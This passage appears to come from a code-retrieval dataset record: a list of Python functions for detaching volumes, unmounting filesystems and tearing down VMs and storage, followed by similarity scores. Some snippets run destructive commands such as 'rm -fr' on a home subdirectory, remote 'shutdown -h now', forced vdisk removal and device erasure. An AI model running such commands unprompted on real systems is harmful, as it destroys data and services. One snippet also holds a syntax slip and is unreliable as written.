ptfhost.remove_ip_addresses()\n duthost1.shell(\"mv {} {}\".format(CONFIG_DB_BACKUP, CONFIG_DB_TEMP))\n reboot(duthost1, localhost)\n\n duthost2.shell(\"mv {} {}\".format(CONFIG_DB_BACKUP, CONFIG_DB_TEMP))\n reboot(duthost2, localhost)", "def peer_detach(self):\n cmd = \"gluster peer detach %s\"%(self.server)\n if self.force is True:\n cmd = cmd + ' force'\n cmdlist = shlex.split(cmd)\n output = subprocess.Popen(cmdlist, stdout = subprocess.PIPE,\n stderr = subprocess.PIPE)\n # TODO: Do more extensive error check\n stdout = output.stdout.read()\n stderr = output.stderr.read()\n print json.dumps({\n \"Server detached\": self.server,\n \"Status\": stdout\n })", "def detach(args, **_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.target.instance)\n\n if _detach_external_volume_or_instance():\n return\n\n ctx.logger.debug('Detaching EBS volume {0}'.format(volume_id))\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n try:\n detached = volume_object.detach(**args)\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n if not detached:\n raise NonRecoverableError(\n 'Failed to detach volume {0} from instance {1}'\n .format(volume_id, instance_id))\n\n utils.unassign_runtime_property_from_resource(\n 'instance_id', ctx.source.instance)\n ctx.logger.info(\n 'Detached volume {0} from instance {1}.'\n .format(volume_id, instance_id))", "def hard_reset(self) -> None:\n os.system('rm -fr \"$HOME/.daf/\"')", "def remove_vdisk_from_svc(svc, vdisk):\r\n svc_ssh = openSSH(svc, getpass.getuser())\r\n ## First we need to unmap from the host\r\n print \"Removing the mapping between %s on %s...\" % (vdisk[\"name\"],\r\n vdisk[\"hostlist\"][0])\r\n command = \"rmvdiskhostmap -host %s %s\" % (vdisk[\"hostlist\"][0],\r\n vdisk[\"name\"])\r\n print command\r\n output = svc_ssh.exec_command(command)[1].readlines()\r\n for line in output:\r\n print line.strip()\r\n ## Remove the volume\r\n print \"Removing the vdisk %s...\" % vdisk[\"name\"]\r\n command = \"rmvdisk %s\" % vdisk[\"name\"]\r\n print command\r\n output = svc_ssh.exec_command(command)[1].readlines()\r\n for line in output:\r\n print line.strip()\r\n svc_ssh.close()\r\n ## End remove_vdisk_from_svc\r", "def _ConvertDrbdToPlain(self, feedback_fn):\n secondary_nodes = self.cfg.GetInstanceSecondaryNodes(self.instance.uuid)\n disks = self.cfg.GetInstanceDisks(self.instance.uuid)\n assert len(secondary_nodes) == 1\n assert utils.AnyDiskOfType(disks, [constants.DT_DRBD8])\n\n feedback_fn(\"Converting disk template from 'drbd' to 'plain'\")\n\n old_disks = AnnotateDiskParams(self.instance, disks, self.cfg)\n new_disks = [d.children[0] for d in disks]\n\n # copy over size, mode and name and set the correct nodes\n for parent, child in zip(old_disks, new_disks):\n child.size = parent.size\n child.mode = parent.mode\n child.name = parent.name\n child.nodes = [self.instance.primary_node]\n\n # this is a DRBD disk, return its port to the pool\n for disk in old_disks:\n tcp_port = disk.logical_id[2]\n self.cfg.AddTcpUdpPort(tcp_port)\n\n # Remove the old disks from the instance\n for old_disk in old_disks:\n self.cfg.RemoveInstanceDisk(self.instance.uuid, old_disk.uuid)\n\n # Attach the new disks to the instance\n for (idx, 
new_disk) in enumerate(new_disks):\n self.cfg.AddInstanceDisk(self.instance.uuid, new_disk, idx=idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n # Release locks in case removing disks takes a while\n ReleaseLocks(self, locking.LEVEL_NODE)\n\n feedback_fn(\"Removing volumes on the secondary node...\")\n RemoveDisks(self, self.instance, disks=old_disks,\n target_node_uuid=secondary_nodes[0])\n\n feedback_fn(\"Removing unneeded volumes on the primary node...\")\n meta_disks = []\n for idx, disk in enumerate(old_disks):\n meta_disks.append(disk.children[1])\n RemoveDisks(self, self.instance, disks=meta_disks)", "def down(**kwargs):\n call([\"vagrant\", \"suspend\"], env=env)\n return", "def down(config):\n pass", "def invalidateBoot (self):\n if self.isBootValid(): \n self.mountBootPartition()\n installFilePath = self._getBootInstallationFilePath()\n if os.path.exists(installFilePath):\n os.remove(installFilePath)\n\n #self._runCommandRaiseIfFail(\"rm -rf %s\" % (self._getBootInstallationFilePath()))\n self._log(\"invalidate-boot\").notice(\"boot partition is invalidated\")\n else:\n self._log(\"invalidate-boot\").notice(\"boot partition is already invalid\")", "def teardown(self):\n self.logger.info('Tearing down file server vm')\n self.local_env.execute('uninstall', task_retries=40,\n task_retry_interval=30)", "def deactivate(self):\n if self.parents[0].type == 'dm-multipath':\n devmap = block.getMap(major=self.major, minor=self.minor)\n if devmap:\n try:\n block.removeDeviceMap(devmap)\n except Exception as e:\n raise errors.DeviceTeardownError(\"failed to tear down device-mapper partition %s: %s\" % (self.name, e))\n udev.settle()", "def attach_disk_to_vm(self, vm_ref, instance_name,\n adapter_type, disk_type, vmdk_path=None,\n disk_size=None, linked_clone=False,\n controller_key=None, unit_number=None,\n device_name=None):\n client_factory = self._session._get_vim().client.factory\n vmdk_attach_config_spec = vm_util.get_vmdk_attach_config_spec(\n client_factory, adapter_type, disk_type,\n vmdk_path, disk_size, linked_clone,\n controller_key, unit_number, device_name)\n\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_attach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())", "def detach(self):\n raise NotImplementedError()", "def reconfigure_nova_ephemeral_disk(self):\n self.check_run('reconfigure_nova_ephemeral_disk')\n self.show_step(1, initialize=True)\n self.env.revert_snapshot(\"reconfigure_overcommit_ratio\")\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n computes = self.fuel_web.get_nailgun_cluster_nodes_by_roles(\n cluster_id, ['compute'])\n\n self.show_step(2)\n existing_configs = self.fuel_web.client.list_configuration(\n cluster_id)\n for existing_config in existing_configs:\n self.fuel_web.client.delete_configuration(existing_config[\"id\"])\n\n self.show_step(3)\n config = utils.get_config_template('nova_disk')\n structured_config = get_structured_config_dict(config)\n self.fuel_web.client.upload_configuration(config,\n cluster_id,\n role='compute')\n\n service_name = 
\"nova-compute\"\n\n uptimes = self.get_service_uptime(computes, service_name)\n\n self.show_step(4)\n task = self.fuel_web.client.apply_configuration(cluster_id,\n role='compute')\n self.show_step(5)\n self.fuel_web.assert_task_success(task, timeout=900, interval=5)\n\n self.show_step(6)\n self.check_service_was_restarted(computes, uptimes, service_name)\n\n self.show_step(7)\n self.check_config_on_remote(computes, structured_config)\n\n os_conn = os_actions.OpenStackActions(\n self.fuel_web.get_public_vip(cluster_id))\n\n self.show_step(8)\n self.show_step(9)\n self.show_step(10)\n self.show_step(11)\n self.show_step(12)\n self.check_nova_ephemeral_disk(os_conn, cluster_id)\n\n self.env.make_snapshot(\"reconfigure_nova_ephemeral_disk\",\n is_make=True)", "def disconnect_filesystem(self, *args, **kwargs):\n return self._get_storage().disconnect_filesystem(*args, **kwargs)", "def _umount_with_detach(entry_path):\n try:\n fs_linux.umount_filesystem(entry_path)\n except OSError as err:\n _LOGGER.warning('Failed to umount %s: %s',\n entry_path, err)\n # 16 means device busy\n if err.errno == 16:\n try:\n fs_linux.umount_filesystem(entry_path, lazy=True)\n except OSError as err:\n _LOGGER.warning('Failed to lazy umount %s: %s',\n entry_path, err)", "def detach_volume(self, volume_id, instance_id=None,\r\n device=None, force=False):\r\n params = {'VolumeId' : volume_id}\r\n if instance_id:\r\n params['InstanceId'] = instance_id\r\n if device:\r\n params['Device'] = device\r\n if force:\r\n params['Force'] = 'true'\r\n return self.get_status('DetachVolume', params, verb='POST')", "def detach_volume(self, volume: Union[dto.Volume, str]) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def vm_deprovision(self, params: dict) -> Tuple[\"Status\", dict]:", "def down(\n context,\n user=get_local_user(),\n remote=False,\n instance=None,\n stack=None,\n images=\"all\",\n volumes=True,\n orphans=False,\n):\n command = f\"down --rmi {images}\"\n\n if volumes:\n command = f\"{command} --volumes\"\n\n if orphans:\n command = f\"{command} --remove-orphans\"\n\n run_command(context, user, remote, instance, stack, command)", "def storage_reset(self):\n daos_srv_bin = os.path.join(self.daosbinpath, \"daos_server\")\n cmd = \"{} storage prepare -n --reset -f\".format(daos_srv_bin)\n result = pcmd(self._hosts, cmd)\n if len(result) > 1 or 0 not in result:\n raise ServerFailed(\"Error resetting NVMe storage\")", "def set_virtual_disk_storage_profile(vm, hardware_device, profile):\n\n spec = vim.vm.ConfigSpec()\n device_specs = []\n profile_specs = []\n profile_spec = vim.vm.DefinedProfileSpec()\n profile_spec.profileId = profile.profileId.uniqueId\n profile_specs.append(profile_spec)\n\n device_spec = vim.vm.device.VirtualDeviceSpec()\n device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit\n device_spec.device = hardware_device\n device_spec.profile = profile_specs\n device_specs.append(device_spec)\n spec.deviceChange = device_specs\n vm.ReconfigVM_Task(spec)", "def unmap(self, ignore_fail=False):\n run_cmd('kpartx', '-d', self.filename, ignore_fail=ignore_fail)\n for part in self.partitions:\n self.mapdev = None", "def DetachVolume(self, request, global_params=None):\n config = self.GetMethodConfig('DetachVolume')\n return self._RunMethod(\n config, request, global_params=global_params)", "def detach(self, phy_layer):\n self._attached_phys.remove(phy_layer)", "def peer_detach(mnode, server, force=False):\n 
if force:\n cmd = \"gluster peer detach %s force --mode=script\" % server\n else:\n cmd = \"gluster peer detach %s --mode=script\" % server\n return g.run(mnode, cmd)", "def deprovision(project, node, network, nic):\n data = {constants.PROJECT_PARAMETER: project,\n constants.NODE_NAME_PARAMETER: node,\n constants.NETWORK_PARAMETER: network,\n constants.NIC_PARAMETER: nic}\n res = requests.delete(_url + \"deprovision/\", data=data, auth=(\n _username, _password))\n click.echo(res.content)", "def unmount(self, path=None, vm=None):\n os.system(f\"multipass unmount {vm}:{path}\")\n dict_result = self._get_mount_status(vm=vm)\n return dict_result", "def down(self, arguments):\n force = arguments['--force']\n\n instance_name = arguments['<instance>']\n instance_name = self.activate(instance_name)\n\n vmrun = VMrun(self.vmx, user=self.user, password=self.password)\n if not force and vmrun.installedTools():\n stopped = vmrun.stop()\n else:\n stopped = vmrun.stop(mode='hard')\n if stopped is None:\n puts_err(colored.red(\"Not stopped\", vmrun))\n else:\n puts_err(colored.green(\"Stopped\", vmrun))", "def reboot_guest(self, vm):\n try:\n self.client.reboot_guest(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def RevertVolume(self, uuid, passphrase, passwd=''):\n if not util.UuidIsValid(uuid):\n raise storage.InvalidUUIDError('Invalid UUID: ' + uuid)\n self.UnlockVolume(uuid, passphrase)\n returncode, _, _ = util.Exec(\n ('sudo', '-k', '-S', FDESETUP, 'disable'),\n stdin=passwd+'\\n')\n\n if returncode != 0:\n raise storage.CouldNotRevertError('Could not disable encryption (%s).' % (\n returncode))", "def remove():\n vbox = Vbox(env.vm_name)\n vbox.remove()", "def detach(self):\n if (self.status == volume_status.ATTACHED or self.status == volume_status.IN_USE) \\\n and self.volume:\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n self.wait_for_status(volume_status.AVAILABLE, 240)\n if self.volume and self.status != volume_status.AVAILABLE:\n log.debug('Attempting to detach again.')\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\" % (\n self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n if not self.wait_for_status(volume_status.AVAILABLE, 60):\n log.warning('Volume {0} did not detach properly. 
Left in state {1}'\n .format(self.volume_id, self.status))\n return False\n else:\n log.debug(\"Volume '%s' already not attached ('%s')\"\n % (self.volume_id, self.status))\n return False\n return True", "def umount_mdv():\n with open(\"/proc/self/mounts\", \"r\") as mounts:\n for line in mounts.readlines():\n if \"/stratis/.mdv-\" in line:\n mountpoint = line.split()[1]\n exec_command([\"umount\", mountpoint])", "def deconfigure(self):\n\n self.platform.deconfigure()", "def down(config, database, semester, course):\n pass", "def down(config, database, semester, course):\n pass", "def reset_old_config(self):\n stringa = \"tc qdisc del dev \" + self.__interface + \" root\"\n cmd = shlex.split(stringa)\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n o, e = proc.communicate(timeout=1)\n except subprocess.TimeoutExpired:\n proc.kill()\n raise RuntimeWarning(\"Old configuration not eliminated\")\n\n if e.decode('ascii') != \"\":\n raise RuntimeError(e.decode('ascii'))\n return proc.returncode", "def remove(self, mount_point, delete_vols=False, detach=True):\n log.debug(\"Removing volume-based FS @ mount point {0} (delete_vols: \"\n \"{1}; detach: {2})\".format(mount_point, delete_vols, detach))\n self.unmount(mount_point)\n if detach:\n log.debug(\"Detaching volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if self.detach():\n log.debug(\"Detached volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if ((self.static and (ServiceRole.GALAXY_DATA not in self.fs.svc_roles))\n or delete_vols):\n log.debug(\"Deleting volume {0} as part of {1} removal\".format(\n self.volume_id, self.fs.get_full_name()))\n self.delete()\n else:\n log.debug(\"Unmounted {0} but was instructed not to detach volume {1}\"\n .format(self.fs.get_full_name(), self.volume_id))", "def erase_device(device):\n command = 'erase \"%s\"' % (device.udid,)\n _run_command(command)", "def pull_disk(self, disk, update_fields=None):\n import_time = timezone.now()\n imported_disk = self.import_disk(\n disk.vm.backend_id, disk.backend_id, save=False\n )\n\n disk.refresh_from_db()\n if disk.modified < import_time:\n if not update_fields:\n update_fields = models.Disk.get_backend_fields()\n\n update_pulled_fields(disk, imported_disk, update_fields)", "def unmap_volume(self, host_name, volume_name):\n cmd = \"svctask rmvdiskhostmap -host %s %s\" % \\\n (host_name, volume_name)\n self._svc_command(cmd)", "def deconfigure(self):\n yield self._r2rm_client.until_synced(2)\n response = yield self._r2rm_client.req.force_deconfigure_board(self._icom_id)\n if not response.reply.reply_ok():\n self.log.error(\"Error on deconfigure request: {}\".format(\n response.reply.arguments[1]))\n raise EddRoach2ProductError(response.reply.arguments[1])\n self.teardown_sensors()\n self._firmware = None\n self._icom_id = None", "def remove_device(self, path):\n pass", "def unexport_disk(self, initiator_iqn, volume_name, iscsi_config):\n lun_name = self._lun_name(volume_name)\n LOG.debug(\"unexport lun %(lun)s\", {'lun': lun_name})\n lun = self._get_lun(iscsi_config, lun_name, initiator_iqn)\n if not lun:\n LOG.debug(\"Didn't find LUN on gateway.\")\n return\n\n try:\n LOG.debug(\"unexporting %(lun)s\", {'lun': lun_name})\n self.client.unexport_disk(self.target_iqn, initiator_iqn,\n self.configuration.rbd_pool,\n volume_name)\n except client_exceptions.ClientException as ex:\n LOG.exception(ex)\n raise exception.VolumeBackendAPIException(\n data=ex.get_description())", "def 
erase(self):\n command = \"export STLINK_DEVICE=\" + self.stlink.port + \"; st-flash erase\"\n subprocess.run(command, shell=True)\n time.sleep(1)", "def umount(self, vol_name, mountpoint, instance):\n LOG.debug('_HostMountState.umount(vol_name=%(vol_name)s, '\n 'mountpoint=%(mountpoint)s) generation %(gen)s',\n {'vol_name': vol_name, 'mountpoint': mountpoint,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n try:\n mount.remove_attachment(vol_name, instance.uuid)\n except KeyError:\n LOG.warning(\"Request to remove attachment (%(vol_name)s from \"\n \"%(mountpoint)s, but we don't think it's in use.\",\n {'vol_name': vol_name, 'mountpoint': mountpoint},\n instance=instance)\n\n if not mount.in_use():\n mounted = os.path.ismount(mountpoint)\n\n if mounted:\n mounted = self._real_umount(mountpoint)\n\n # Delete our record entirely if it's unmounted\n if not mounted:\n del self.mountpoints[mountpoint]\n\n LOG.debug('_HostMountState.umount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def detach_volume(self, volume):\r\n if hasattr(volume, \"id\"):\r\n volume_id = volume.id\r\n else:\r\n volume_id = volume\r\n return self.ec2.detach_volume(volume_id=volume_id, instance_id=self.instance_id)", "def eject(mountpoint=DMG_MOUNT, silent=False, dry_run=ARGS.dry_run):\n if not isinstance(mountpoint, Path):\n mountpoint = Path(mountpoint)\n\n cmd = ['/usr/bin/hdiutil', 'eject', str(mountpoint)]\n\n if not dry_run and not mountpoint.exists():\n LOG.warning('Cannot unmount {mountpoint} - it does not exist'.format(mountpoint=mountpoint))\n elif not dry_run and mountpoint.exists():\n _p = subprocess.run(cmd, capture_output=True, encoding='utf-8')\n LOG.debug('{cmd} ({returncode})'.format(cmd=' '.join([str(x) for x in cmd]), returncode=_p.returncode))\n\n if _p.returncode == 0:\n if not silent:\n LOG.info('Unmounted {mountpoint}'.format(mountpoint=mountpoint))\n else:\n LOG.debug('Error: '. 
_p.stderr.strip() if _p.stderr else _p.stdout.strip())\n elif ARGS.dry_run and not dry_run:\n LOG.warning('Unmount {mountpoint}'.format(mountpoint=mountpoint))", "def memory(self, memory_mb):\n\n config_spec = vim.vm.ConfigSpec()\n config_spec.memoryMB = memory_mb\n return self.vm_obj.ReconfigVM_Task(config_spec)", "def unmount(self, client):\n log(\"Unmounting %s backend from %s\" %\n (self.backend, self.path), self.opt)\n getattr(client, self.unmount_fun)(mount_point=self.path)", "def do_network_detach(cs, args):\n opts = {}\n opts['container'] = args.container\n opts['network'] = args.network\n opts['port'] = args.port\n opts = zun_utils.remove_null_parms(**opts)\n try:\n cs.containers.network_detach(**opts)\n print(\"Request to detach network from container %s \"\n \"has been accepted.\" % args.container)\n except Exception as e:\n print(\"Detach network from container %(container)s \"\n \"failed: %(e)s\" % {'container': args.container, 'e': e})", "def restoreCowPartition(disk):\n currentRoot = getCurrentRootPartition(disk)\n\n mountDir = mount(currentRoot)\n if mountDir is None:\n return False\n\n cowDir = mount(\"%s5\" % disk)\n if cowDir is None:\n return False\n\n path = os.path.join(mountDir, COW_BACKUP)\n cmd = \"tar -xzp --numeric-owner -f %s -C %s\" % (path, cowDir) \n status, output = commands.getstatusoutput(cmd)\n if status != 0:\n return False\n\n os.remove(path)\n\n if (not umount(mountDir)) or (not umount(cowDir)):\n return False\n\n rc = subprocess.call(\"nvsetenv boot-once \\\"\\\" &>/dev/null\", shell=True)\n if rc == 1:\n return False\n\n return True", "def shutdownVM(self):\n\t\tlog.info(\"\\tStopping the container...\")\n#\t\texecuteCommandSSH(\"lxc-stop\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"lxc-destroy\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"shutdown -h now\")", "def destroy_node(self):\n driver = self.driver\n driver.ex_detach_floating_ip_from_node(self.node, self.floating_ip)\n driver.destroy_node(self.node)\n sleep(15)\n for volume in self.volumes:\n driver.destroy_volume(volume)", "def deleteVirtualMachine(self,node,vmid):\n data = self.connect('delete',\"nodes/%s/qemu/%s\" % (node,vmid),None)\n return data", "def reset_virtual_machine(self, vm):\n try:\n self.client.reset_vm(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def destroy_vm_vdis(name=None, session=None, call=None):\n if session is None:\n session = _get_session()\n ret = {}\n # get vm object\n vms = session.xenapi.VM.get_by_name_label(name)\n if len(vms) == 1:\n # read virtual block device (vdb)\n vbds = session.xenapi.VM.get_VBDs(vms[0])\n if vbds is not None:\n x = 0\n for vbd in vbds:\n vbd_record = session.xenapi.VBD.get_record(vbd)\n if vbd_record[\"VDI\"] != \"OpaqueRef:NULL\":\n # read vdi on vdb\n vdi_record = session.xenapi.VDI.get_record(vbd_record[\"VDI\"])\n if \"iso\" not in vdi_record[\"name_label\"]:\n session.xenapi.VDI.destroy(vbd_record[\"VDI\"])\n ret[\"vdi-{}\".format(x)] = vdi_record[\"name_label\"]\n x += 1\n return ret", "def delete_volume(self, uid):\n try:\n volInfo = self.get_volume_info(uid)\n except SVCVolumeNotFound as ex:\n LOG.warn(_(\"No volume with UID %s found.\") % uid)\n # assume deleted if not found\n return\n\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n self.remove_fcmapping(uid)\n cmd = \"svctask rmvdisk -force %s\" % (volID)\n self._svc_command(cmd)", "def detach_entity(self, entity_id):\n attachment = getattr(self.entities[entity_id],\n self.attachment_system.system_id)\n if not attachment.is_root:\n 
self.attachment_system.detach_child(entity_id)", "def deconfigure(self):\n\n pass", "def cleanup_infrastructure_storage(config, datacenter):\n print \"Removing storage devices in datacenter %s...\" % datacenter.getName()\n for device in datacenter.listStorageDevices():\n device.delete()", "def detach_volume(self, volume_id, instance_id = \"\"):\n response = volume.detach_volume(self.url, self.verb, self.headers,\n self.version, volume_id, instance_id)\n if response is not None :\n res = DetachVolumeResponse.DetachVolumeResponse()\n parseString(str(response.text), res)\n return res\n else :\n return None", "def shutdown_guest(self, vm):\n try:\n self.client.shutdown_guest(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def eject_image(self, identity, device):\n device_info = self._get_device(identity, device)\n\n device_info['Image'] = ''\n device_info['ImageName'] = ''\n device_info['Inserted'] = False\n device_info['WriteProtected'] = False\n device_info['UserName'] = ''\n device_info['Password'] = ''\n\n self._devices.update({(identity, device): device_info})\n\n local_file = device_info.pop('_local_file', None)\n if local_file:\n try:\n os.unlink(local_file)\n\n self._logger.debug(\n 'Removed local file %(file)s for %(identity)s' % {\n 'identity': identity, 'file': local_file})\n except FileNotFoundError:\n # Ignore error as we are trying to remove the file anyway\n pass", "def vm_delete(vm_hostname, retire=False):\n\n with _get_vm(vm_hostname, unlock=retire, allow_retired=True) as vm:\n if vm.dataset_obj['datacenter_type'] == 'aws.dct':\n vm_status_code = vm.aws_describe_instance_status(\n vm.dataset_obj['aws_instance_id'])\n if vm_status_code != AWS_RETURN_CODES['stopped']:\n raise InvalidStateError(\n '\"{}\" is still running.'.format(vm.fqdn))\n else:\n vm.aws_delete()\n elif vm.dataset_obj['datacenter_type'] == 'kvm.dct':\n # Make sure the VM has a hypervisor and that it is defined on it.\n # Abort if the VM has not been defined.\n _check_defined(vm)\n\n # Make sure the VM is shut down, abort if it is not.\n if (\n vm.hypervisor\n and vm.hypervisor.vm_defined(vm)\n and vm.is_running()\n ):\n raise InvalidStateError('\"{}\" is still running.'.format(\n vm.fqdn)\n )\n\n # Delete the VM from its hypervisor if required.\n if vm.hypervisor and vm.hypervisor.vm_defined(vm):\n vm.hypervisor.undefine_vm(vm)\n else:\n raise NotImplementedError(\n 'This operation is not yet supported for {}'.format(\n vm.dataset_obj['datacenter_type'])\n )\n\n # Delete the machines cert from puppet in case we want to build one with the same name in the future\n clean_cert(vm.dataset_obj)\n\n # Delete the serveradmin object of this VM\n # or update its state to 'retired' if retire is True.\n if retire:\n vm.dataset_obj['state'] = 'retired'\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and set to \"retired\" state.'.format(\n vm.fqdn)\n )\n else:\n vm.dataset_obj.delete()\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and deleted from Serveradmin'.format(\n vm.fqdn)\n )", "def unmountLXCPrivate(self,node,vmid):\n post_data = None\n data = self.connect('post','nodes/%s/lxc/%s/status/unmount' % (node,vmid), post_data)\n return data", "def umount_root_vm(self):\n print \"demontage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"umount %s\" % self.rep_vhosts_vm)", "def hfp_sp_detach(handle, sp_dn):\r\n\r\n sp = handle.query_dn(sp_dn)\r\n if sp is None:\r\n raise ValueError(\"sp does not exist.\")\r\n\r\n sp.host_fw_policy_name = \"\"\r\n 
handle.set_mo(sp)\r\n handle.commit()\r\n return sp", "def cleanup(self, context, instance, network_info, block_device_info=None,\n destroy_disks=True):\n pass" ]
[ "0.765152", "0.71042055", "0.710292", "0.7051662", "0.6706635", "0.66381764", "0.65310085", "0.63526535", "0.62885463", "0.62843525", "0.6217464", "0.62058824", "0.6176701", "0.61576825", "0.6140649", "0.6140027", "0.6105745", "0.6038374", "0.6036814", "0.5985441", "0.58947974", "0.5870777", "0.5870777", "0.5830202", "0.5812258", "0.57748884", "0.57565343", "0.5755057", "0.57426465", "0.5661209", "0.5659315", "0.56199116", "0.561739", "0.5607187", "0.5556421", "0.554693", "0.55364925", "0.5532343", "0.5512811", "0.5505269", "0.54041326", "0.53890795", "0.5381981", "0.53720903", "0.5365602", "0.5339012", "0.5321437", "0.53209406", "0.53197384", "0.53138393", "0.5307628", "0.5297306", "0.529485", "0.5283426", "0.52669513", "0.52540106", "0.5252714", "0.52431434", "0.5241058", "0.5239241", "0.52366567", "0.5232802", "0.52163535", "0.5206508", "0.5199707", "0.51770586", "0.51770586", "0.5160918", "0.5158883", "0.5134983", "0.51309896", "0.51272565", "0.51118726", "0.5111183", "0.510036", "0.50941575", "0.50857514", "0.50835186", "0.50833106", "0.50574726", "0.50522834", "0.5051085", "0.5048217", "0.50416344", "0.5040187", "0.5039953", "0.5020742", "0.502016", "0.5019701", "0.5014547", "0.5010371", "0.50049853", "0.5004707", "0.49991843", "0.4987585", "0.49857342", "0.498407", "0.4982235", "0.49786016", "0.49776378" ]
0.74518675
1
Return volume connector information.
def get_volume_connector(self, instance):
    iqn = volume_util.get_host_iqn(self._session, self._cluster)
    return {'ip': CONF.vmwareapi_host_ip,
            'initiator': iqn,
            'host': CONF.vmwareapi_host_ip}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialize_connection(self, volume, connector):\n export = '%s/%s' % (volume['provider_location'], volume['name'])\n data = {'export': export, 'name': 'volume'}\n if volume['provider_location'] in self.shares:\n data['options'] = self.shares[volume['provider_location']]\n return {\n 'driver_volume_type': self.driver_volume_type,\n 'data': data\n }", "def get_volume_connector(self, instance):\n props = {}\n # 'get_volume_connector' will be invoked during creation\n # of the partition and during deletion of the partition.\n # But 'wwpns' we can access only when partition is available.\n # During spawn flow 'get_volume_connector' function will be called\n # before 'spawn' function so to get 'wwpns' we first creating\n # the partition using 'prep_for_spawn' function so that\n # we can access 'wwpns'.(i.e - else part)\n # But during deletion 'get_volume_connector' will be called\n # after 'destroy' function which will delete the partition so\n # after that we can not get the 'wwpns'\n # In order to get 'wwpns' after 'destroy' function we are\n # saving 'wwpns' before deleting partition in 'destroy' function\n # in 'deleted_instance_wwpns_mapping' variable and using these 'wwpns'\n # in 'get_volume_connector'(i.e - if part)\n # after using these 'wwpns' we are removing these 'wwpns' from\n # 'deleted_instance_wwpns_mapping' variable because\n # we are not going to use these 'wwpns' any more after this.\n if instance.uuid in self.deleted_instance_wwpns_mapping:\n props['wwpns'] = self.deleted_instance_wwpns_mapping.pop(\n instance.uuid)\n else:\n inst = vm.PartitionInstance(instance, self._cpc)\n props['wwpns'] = inst.get_partition_wwpns()\n\n props['host'] = instance.uuid\n\n return props", "def initialize_connection(\n self, volume, connector, is_snapshot=False, lun=None,\n is_mirror=False):\n conn_info, map_info = super(HBSDRESTISCSI, self).initialize_connection(\n volume, connector, is_snapshot, lun)\n return conn_info", "def _get_data(self):\n c = Connector(self.host, self.username, self.password)\n return c.getLanDevices()", "def initialize_connection(self, volume, connector):\n # Non-shared connections was the original implementation where all the\n # export & mapping was done on export and the connection info was\n # stored in the volume, so let the original implementation handle it.\n if not self.share_targets:\n return super().initialize_connection(volume, connector)\n\n # For the shared case the export only stores the path of the volume\n volume_path = volume.provider_location\n if not os.path.exists(volume_path):\n raise exception.InvalidConfigurationValue(\n 'Target driver configured with shared targets, but volume '\n 'exported as non shared.')\n\n nqn, ns_id = self._map_volume(volume, volume_path, connector)\n uuid = self._get_nvme_uuid(volume)\n return {\n 'driver_volume_type': self.protocol,\n 'data': self._get_connection_properties(nqn,\n self.target_ips,\n self.target_port,\n self.nvme_transport_type,\n ns_id, uuid),\n }", "def volume():\n vol = sonos.volume\n return vol", "def Vc(self):\n return self.__central_volume", "def connect_volume(self, connection_properties):\n\n sheepdog_handle = self._get_sheepdog_handle(connection_properties)\n return {'path': sheepdog_handle}", "def volume(self):\n return {'lvad': self._v}", "def connector(self):\n if '_connector' not in self.__dict__:\n from meerschaum.connectors.parse import parse_instance_keys\n conn = parse_instance_keys(self.connector_keys)\n if conn:\n self._connector = conn\n else:\n return None\n return 
